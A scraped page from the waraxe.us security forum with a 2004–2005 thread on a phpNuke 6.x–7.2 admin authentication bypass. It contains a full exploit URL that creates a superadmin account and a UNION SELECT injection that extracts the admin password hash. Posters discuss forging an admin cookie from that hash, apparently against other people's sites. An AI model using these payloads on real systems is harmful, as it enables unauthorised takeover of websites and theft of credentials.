Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: November 22, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 56 Members: 0 Total: 56 Full disclosure APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1 Local Privilege Escalations in needrestart APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2 APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1 APPLE-SA-11-19-2024-2 visionOS 2.1.1 APPLE-SA-11-19-2024-1 Safari 18.1.1 Reflected XSS - fronsetiav1.1 XXE OOB - fronsetiav1.1 St. Poelten UAS | Path Traversal in Korenix JetPort 5601 St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS) SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879) Security issue in the TX Text Control .NET Server for ASP.NET. SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater Unsafe eval() in TestRail CLI IT Security and Insecurity Portal www.waraxe.us Forum Index -> PhpNuke -> Help Admin-level authentication bypass in phpnuke 6.x-7.2 View previous topic :: View next topic Help Admin-level authentication bypass in phpnuke 6.x-7.2 Posted: Sun Jul 25, 2004 11:49 pm zerocool Regular user Joined: Jul 17, 2004 Posts: 20 hey anyone can explain me why when iam trying to do something like this http://somesite.com/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&;add_email=foo%20AT%20bar%20DOT%20com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox then i get Selection from database failed! ???????? its mean that the webpage is secure of this sql injection?? or its Vulnerabilities?? and if its Vulnerabilities can you explain me why????? and if anyone know how can i add some superadmin user with this http://somesite.com/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&;add_email=foo%20AT%20bar%20DOT%20com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox after its tell me Selection from database failed so its will be great thanks alot Zerocool Posted: Mon Jul 26, 2004 8:51 am zer0-c00l Advanced user Joined: Jun 25, 2004 Posts: 72 Location: BRAZIL! another zero cool haha i think the site isnt vulnerable if shows 'slection from database failed'.. but the string works perfect bro come in Posted: Mon Jul 26, 2004 11:40 am zerocool Regular user Joined: Jul 17, 2004 Posts: 20 so why its tell me selection from database faild and its not add a superadmin user with user:waraxe2 and pass:coolpass why when iam post this command its only tell me selection from database faild (( what i need 2 do? a Posted: Mon Jul 26, 2004 2:38 pm SteX Advanced user Joined: May 18, 2004 Posts: 181 Location: Serbia Site is patched...Site have updated php-nuke version,or have some protection system.. That exploit is old and dont work for 99% php-nuke sites.. _________________ We would change the world, but God won't give us the sourcecode... ....Watch the master. Follow the master. Be the master.... ------------------------------------------------------- Thanks Bro Posted: Mon Jul 26, 2004 5:42 pm zerocool Regular user Joined: Jul 17, 2004 Posts: 20 Thanks For the help and i have another Question when iam put this command to a site modules.php?name=Journal&file=search&bywhat=aid&exact=1&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* its give me a hash but when iam view the profile of the user that have this hash i see id 0 why its tell me id 0??????? and give me hash to id 0 when i putting this sql injection command ((?? and where i can find the radminsuper id?? Posted: Mon Jul 26, 2004 8:44 pm SteX Advanced user Joined: May 18, 2004 Posts: 181 Location: Serbia God Admin always has ID 1 .. _________________ We would change the world, but God won't give us the sourcecode... ....Watch the master. Follow the master. Be the master.... ------------------------------------------------------- Come In Stex Posted: Mon Jul 26, 2004 8:57 pm zerocool Regular user Joined: Jul 17, 2004 Posts: 20 yeah i know god admin is id 1 bro but when iam doing this sql injection command i see the hash with viewprofile id 0 why its this?? and how can i figure the God Admin id nickname?? because if i want to change in my cookie to the admin "cookie" i need to know the id of the radminsuper like this Stex:d3721b54ee6f43b22910c7e82775d56f so know i only know the hash:d3721b54ee6f43b22910c7e82775d56f but i dont know the radminsuper id nickname ( so i cant do nothing how can i know the superadmin nickname (? Thanks guys i was made to know the aid of the admin :) Posted: Tue Jul 27, 2004 4:09 pm zerocool Regular user Joined: Jul 17, 2004 Posts: 20 hey take off is info in the memberlist but i was doing thing like this forum-userprofile-2.html&sid=3be12190a8ffa6b4ac8aa8d92cf45381g and then i so is aid thanks again bye bye Posted: Tue Jun 07, 2005 7:54 pm err Beginner Joined: Jun 07, 2005 Posts: 1 when i try i get: Author's Creation Error You must complete all compulsory fields seems like exploit gonna work.. because it shows the menu admin. Help Admin-level authentication bypass in phpnuke 6.x-7.2 www.waraxe.us Forum Index -> PhpNuke You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 1 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds